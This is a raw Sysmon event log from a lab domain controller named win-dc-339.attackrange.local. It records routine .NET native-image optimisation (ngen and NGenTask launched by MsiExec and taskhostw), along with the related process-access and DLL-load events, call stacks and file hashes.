14:57:19.686{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBCF-607E-C20B-00000000BB01}6656c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.686{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-C10B-00000000BB01}3984C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.686{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-C00B-00000000BB01}6548C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.686{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.686{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.686{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.686{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.686{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-BF0B-00000000BB01}4488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.671{A7A01FEF-EBCF-607E-B10B-00000000BB01}34246344C:\Windows\system32\taskhostw.exe{A7A01FEF-EBCF-607E-BF0B-00000000BB01}4488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c01b0|UNKNOWN(00007FF8032415F2) 154100x800000000000000073545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.685{A7A01FEF-EBCF-607E-BF0B-00000000BB01}4488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe4.8.4330.0 built by: NET48REL1LAST_BMicrosoft .NET Framework optimization serviceMicrosoft® .NET FrameworkMicrosoft CorporationNGenTask.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe" /RuntimeWide /StopEvent:868C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=D2DDF021EE6A8A649FB58F6DD05EDED7,SHA256=AC1B312B5D048DAC81327CF083BDEF2966AA883208455490E73D6E34C932B7D9,IMPHASH=00000000000000000000000000000000{A7A01FEF-EBCF-607E-B10B-00000000BB01}3424C:\Windows\System32\taskhostw.exetaskhostw.exe /RuntimeWide 10341000x800000000000000073544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.671{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-BC0B-00000000BB01}1156c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.671{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-BC0B-00000000BB01}1156c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.671{A7A01FEF-EBCF-607E-BC0B-00000000BB01}1156C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.671{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.671{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.671{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.671{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.671{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-BE0B-00000000BB01}6856C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.671{A7A01FEF-EBCF-607E-B10B-00000000BB01}34242640C:\Windows\system32\taskhostw.exe{A7A01FEF-EBCF-607E-BE0B-00000000BB01}6856C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c01b0|UNKNOWN(00007FF8032415F2) 154100x800000000000000073535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.683{A7A01FEF-EBCF-607E-BE0B-00000000BB01}6856C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe4.8.4330.0 built by: NET48REL1LAST_BMicrosoft .NET Framework optimization serviceMicrosoft® .NET FrameworkMicrosoft CorporationNGenTask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe" /RuntimeWide /StopEvent:296C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=196F531423F864F990B24F3D3AFA9AA1,SHA256=353C8C617C87A56F93C9914E219BE4E30A45A0DEA8D98BF34C6BD81A6A287916,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{A7A01FEF-EBCF-607E-B10B-00000000BB01}3424C:\Windows\System32\taskhostw.exetaskhostw.exe /RuntimeWide 10341000x800000000000000073534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.655{A7A01FEF-EBCF-607E-BD0B-00000000BB01}42126284C:\Windows\system32\conhost.exe{A7A01FEF-EBCF-607E-BC0B-00000000BB01}1156c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.655{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-BD0B-00000000BB01}4212C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.640{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-BC0B-00000000BB01}1156c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.640{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBCF-607E-BC0B-00000000BB01}1156c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.640{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-BA0B-00000000BB01}5568c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.640{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-BA0B-00000000BB01}5568c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.640{A7A01FEF-EBCF-607E-BA0B-00000000BB01}5568C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.608{A7A01FEF-EBCF-607E-BB0B-00000000BB01}43405416C:\Windows\system32\conhost.exe{A7A01FEF-EBCF-607E-BA0B-00000000BB01}5568c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.608{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-BB0B-00000000BB01}4340C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.608{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-BA0B-00000000BB01}5568c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 